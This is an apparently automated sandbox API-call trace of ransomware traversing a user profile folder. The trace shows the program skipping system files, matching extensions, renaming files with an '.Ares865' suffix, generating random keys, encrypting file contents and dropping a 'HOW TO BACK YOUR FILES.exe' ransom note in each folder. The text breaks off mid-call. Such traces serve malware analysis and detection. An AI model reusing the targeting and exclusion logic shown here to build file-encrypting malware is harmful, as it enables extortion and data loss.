[0041.915] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.915] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a90cce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a90cce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.915] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.915] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.915] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.915] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.915] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8679d27, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0041.915] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="aoldtz.exe") returned 1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2=".") returned 1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="..") returned 1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="windows") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="bootmgr") returned 1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="temp") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="pagefile.sys") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="boot") returned 1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="ids.txt") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="ntuser.dat") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="perflogs") returned -1 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2="MSBuild") returned -1 [0041.916] lstrlenW (lpString="CurrentDatabase_372.wmdb") returned 24 [0041.916] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\*") returned 61 [0041.916] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="CurrentDatabase_372.wmdb" | out: lpString1="CurrentDatabase_372.wmdb") returned="CurrentDatabase_372.wmdb" [0041.916] lstrlenW (lpString="CurrentDatabase_372.wmdb") returned 24 [0041.916] lstrlenW (lpString="Ares865") returned 7 [0041.916] lstrcmpiW (lpString1="72.wmdb", lpString2="Ares865") returned -1 [0041.916] lstrlenW (lpString=".dll") returned 4 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2=".dll") returned 1 [0041.916] lstrlenW (lpString=".lnk") returned 4 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2=".lnk") returned 1 [0041.916] lstrlenW (lpString=".ini") returned 4 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2=".ini") returned 1 [0041.916] lstrlenW (lpString=".sys") returned 4 [0041.916] lstrcmpiW (lpString1="CurrentDatabase_372.wmdb", lpString2=".sys") returned 1 [0041.916] lstrlenW (lpString="CurrentDatabase_372.wmdb") returned 24 [0041.916] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.Ares865") returned 92 [0041.916] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\currentdatabase_372.wmdb.ares865"), dwFlags=0x1) returned 1 [0041.917] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\currentdatabase_372.wmdb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0041.917] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1069056) returned 1 [0041.917] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0041.917] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0041.917] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0041.918] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0041.918] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0041.918] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0041.918] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x105300, lpName=0x0) returned 0x160 [0041.920] MapViewOfFile (hFileMappingObject=0x160, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x105300) returned 0x1120000 [0041.970] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0041.971] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0041.971] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0041.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0041.971] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb400 [0041.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0041.971] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0041.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0041.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0041.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0041.972] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0041.981] CloseHandle (hObject=0x160) returned 1 [0041.981] CloseHandle (hObject=0x154) returned 1 [0042.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0042.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0042.005] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a90cce0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a90cce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.005] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.005] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd856f385, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1106c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0042.005] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.005] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="aoldtz.exe") returned 1 [0042.005] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2=".") returned 1 [0042.005] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="..") returned 1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="windows") returned -1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="bootmgr") returned 1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="temp") returned -1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="pagefile.sys") returned -1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="boot") returned 1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="ids.txt") returned 1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="ntuser.dat") returned -1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="perflogs") returned -1 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2="MSBuild") returned -1 [0042.006] lstrlenW (lpString="LocalMLS_3.wmdb") returned 15 [0042.006] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 84 [0042.006] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="LocalMLS_3.wmdb" | out: lpString1="LocalMLS_3.wmdb") returned="LocalMLS_3.wmdb" [0042.006] lstrlenW (lpString="LocalMLS_3.wmdb") returned 15 [0042.006] lstrlenW (lpString="Ares865") returned 7 [0042.006] lstrcmpiW (lpString1="_3.wmdb", lpString2="Ares865") returned -1 [0042.006] lstrlenW (lpString=".dll") returned 4 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2=".dll") returned 1 [0042.006] lstrlenW (lpString=".lnk") returned 4 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2=".lnk") returned 1 [0042.006] lstrlenW (lpString=".ini") returned 4 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2=".ini") returned 1 [0042.006] lstrlenW (lpString=".sys") returned 4 [0042.006] lstrcmpiW (lpString1="LocalMLS_3.wmdb", lpString2=".sys") returned 1 [0042.006] lstrlenW (lpString="LocalMLS_3.wmdb") returned 15 [0042.006] lstrlenW (lpString="bak") returned 3 [0042.006] lstrcmpiW (lpString1="mdb", lpString2="bak") returned 1 [0042.006] lstrlenW (lpString="ba_") returned 3 [0042.006] lstrcmpiW (lpString1="mdb", lpString2="ba_") returned 1 [0042.006] lstrlenW (lpString="dbb") returned 3 [0042.006] lstrcmpiW (lpString1="mdb", lpString2="dbb") returned 1 [0042.006] lstrlenW (lpString="vmdk") returned 4 [0042.006] lstrcmpiW (lpString1="wmdb", lpString2="vmdk") returned 1 [0042.006] lstrlenW (lpString="rar") returned 3 [0042.006] lstrcmpiW (lpString1="mdb", lpString2="rar") returned -1 [0042.006] lstrlenW (lpString="zip") returned 3 [0042.007] lstrcmpiW (lpString1="mdb", lpString2="zip") returned -1 [0042.007] lstrlenW (lpString="tgz") returned 3 [0042.007] lstrcmpiW (lpString1="mdb", lpString2="tgz") returned -1 [0042.007] lstrlenW (lpString="vbox") returned 4 [0042.007] lstrcmpiW (lpString1="wmdb", lpString2="vbox") returned 1 [0042.007] lstrlenW (lpString="vdi") returned 3 [0042.007] lstrcmpiW (lpString1="mdb", lpString2="vdi") returned -1 [0042.007] lstrlenW (lpString="vhd") returned 3 [0042.007] lstrcmpiW (lpString1="mdb", lpString2="vhd") returned -1 [0042.007] lstrlenW (lpString="vhdx") returned 4 [0042.007] lstrcmpiW (lpString1="wmdb", lpString2="vhdx") returned 1 [0042.007] lstrlenW (lpString="avhd") returned 4 [0042.007] lstrcmpiW (lpString1="wmdb", lpString2="avhd") returned 1 [0042.007] lstrlenW (lpString="db") returned 2 [0042.007] lstrcmpiW (lpString1="db", lpString2="db") returned 0 [0042.007] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\LocalMLS_3.wmdb.Ares865") returned 83 [0042.007] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\localmls_3.wmdb"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\LocalMLS_3.wmdb.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\localmls_3.wmdb.ares865"), dwFlags=0x1) returned 1 [0042.023] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\LocalMLS_3.wmdb.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\localmls_3.wmdb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0042.023] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=69740) returned 1 [0042.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0042.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0042.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0042.024] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0042.025] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0042.025] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0042.025] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11370, lpName=0x0) returned 0x164 [0042.027] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11370) returned 0x190000 [0042.061] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0042.072] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0042.072] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0042.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0042.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cba28 [0042.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0042.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0042.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0042.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0042.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0042.080] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0042.082] CloseHandle (hObject=0x164) returned 1 [0042.084] CloseHandle (hObject=0x118) returned 1 [0042.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0042.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0042.099] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0042.100] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="aoldtz.exe") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2=".") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="..") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="windows") returned -1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="bootmgr") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="temp") returned -1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="pagefile.sys") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="boot") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="ids.txt") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="ntuser.dat") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="perflogs") returned 1 [0042.100] lstrcmpiW (lpString1="Sync Playlists", lpString2="MSBuild") returned 1 [0042.100] lstrlenW (lpString="Sync Playlists") returned 14 [0042.100] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 75 [0042.100] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="Sync Playlists" | out: lpString1="Sync Playlists") returned="Sync Playlists" [0042.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x2d1ea0 [0042.100] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.100] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 0 [0042.100] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.101] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.101] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0042.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.101] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned 74 [0042.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0042.101] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.101] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.105] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.105] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.105] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.105] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.105] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.105] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.105] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.105] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.105] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0042.106] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0042.106] lstrlenW (lpString="en-US") returned 5 [0042.106] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\*") returned 76 [0042.106] lstrcpyW (in: lpString1=0x2e2e8f6, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0042.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2d1ea0 [0042.106] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.106] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.106] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.106] FindNextFileW (in: hFindFile=0x2ccea8, 